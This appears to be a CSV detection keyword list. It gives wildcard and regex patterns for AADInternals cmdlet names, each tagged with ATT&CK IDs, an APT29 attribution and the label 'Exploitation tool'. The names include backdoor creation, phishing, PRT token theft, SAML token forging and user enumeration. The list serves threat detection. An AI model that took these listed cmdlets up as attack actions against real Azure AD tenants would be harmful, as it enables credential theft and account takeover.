"*Get-AADIntUserPRTKeys*",".{0,1000}Get\-AADIntUserPRTKeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserPRTToken*",".{0,1000}Get\-AADIntUserPRTToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserRealm*",".{0,1000}Get\-AADIntUserRealm.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserRealmExtended*",".{0,1000}Get\-AADIntUserRealmExtended.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserRealmV2*",".{0,1000}Get\-AADIntUserRealmV2.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntUserRealmV3*",".{0,1000}Get\-AADIntUserRealmV3.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntWindowsCredentialsSyncConfig*",".{0,1000}Get\-AADIntWindowsCredentialsSyncConfig.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-Module AADInternals*",".{0,1000}Get\-Module\sAADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 
- T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Grant-AADIntAzureUserAccessAdminRole*",".{0,1000}Grant\-AADIntAzureUserAccessAdminRole.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*https://aadinternals.com/aadinternals/*",".{0,1000}https\:\/\/aadinternals\.com\/aadinternals\/.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Import-Module AADInternals*",".{0,1000}Import\-Module\sAADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Install-AADIntForceNTHash*",".{0,1000}Install\-AADIntForceNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals 
PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Install-Module AADInternals*",".{0,1000}Install\-Module\sAADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Install-Module AADInternals*",".{0,1000}Install\-Module\sAADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Invoke-AADIntAzureVMScript*",".{0,1000}Invoke\-AADIntAzureVMScript.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Invoke-AADIntPhishing*",".{0,1000}Invoke\-AADIntPhishing.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Invoke-AADIntReconAsGuest*",".{0,1000}Invoke\-AADIntReconAsGuest.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Invoke-AADIntReconAsInsider*",".{0,1000}Invoke\-AADIntReconAsInsider.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Invoke-AADIntReconAsOutsider*",".{0,1000}Invoke\-AADIntReconAsOutsider.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Invoke-AADIntSyncAgent*",".{0,1000}Invoke\-AADIntSyncAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Invoke-AADIntUserEnumerationAsGuest*",".{0,1000}Invoke\-AADIntUserEnumerationAsGuest.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Invoke-AADIntUserEnumerationAsInsider*",".{0,1000}Invoke\-AADIntUserEnumerationAsInsider.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Invoke-AADIntUserEnumerationAsOutsider*",".{0,1000}Invoke\-AADIntUserEnumerationAsOutsider.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 
- T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Join-AADIntAzureAD*",".{0,1000}Join\-AADIntAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Join-AADIntDeviceToAzureAD*",".{0,1000}Join\-AADIntDeviceToAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Join-AADIntDeviceToAzureAD.*",".{0,1000}Join\-AADIntDeviceToAzureAD\..{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Join-AADIntDeviceToIntune*",".{0,1000}Join\-AADIntDeviceToIntune.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell 
module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Join-AADIntLocalDeviceToAzureAD*",".{0,1000}Join\-AADIntLocalDeviceToAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Join-AADIntOnPremDeviceToAzureAD*",".{0,1000}Join\-AADIntOnPremDeviceToAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntADFSRefreshToken*",".{0,1000}New\-AADIntADFSRefreshToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*New-AADIntADFSSelfSignedCertificates*",".{0,1000}New\-AADIntADFSSelfSignedCertificates.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntB2CAuthorizationCode*",".{0,1000}New\-AADIntB2CAuthorizationCode.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntB2CRefreshToken*",".{0,1000}New\-AADIntB2CRefreshToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntBackdoor*",".{0,1000}New\-AADIntBackdoor.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntBulkPRTToken*",".{0,1000}New\-AADIntBulkPRTToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntCertificate*",".{0,1000}New\-AADIntCertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntGuestInvitation*",".{0,1000}New\-AADIntGuestInvitation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntHybridHealthService*",".{0,1000}New\-AADIntHybridHealthService.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - 
T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntHybridHealthServiceMember*",".{0,1000}New\-AADIntHybridHealthServiceMember.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntHybridHealtServiceEvent*",".{0,1000}New\-AADIntHybridHealtServiceEvent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntInvitationVBA*",".{0,1000}New\-AADIntInvitationVBA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntMOERADomain*",".{0,1000}New\-AADIntMOERADomain.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure 
AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntMSPartnerDelegatedAdminRequest*",".{0,1000}New\-AADIntMSPartnerDelegatedAdminRequest.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntOneDriveSettings*",".{0,1000}New\-AADIntOneDriveSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntOTP*",".{0,1000}New\-AADIntOTP.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*New-AADIntOTPSecret*",".{0,1000}New\-AADIntOTPSecret.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntP2PDeviceCertificate*",".{0,1000}New\-AADIntP2PDeviceCertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntSAML2Token*",".{0,1000}New\-AADIntSAML2Token.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntSAMLToken*",".{0,1000}New\-AADIntSAMLToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*New-AADIntUserPRTToken*",".{0,1000}New\-AADIntUserPRTToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Open-AADIntOffice365Portal*",".{0,1000}Open\-AADIntOffice365Portal.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Open-AADIntOWA*",".{0,1000}Open\-AADIntOWA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Read-AADIntAccesstoken*",".{0,1000}Read\-AADIntAccesstoken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - 
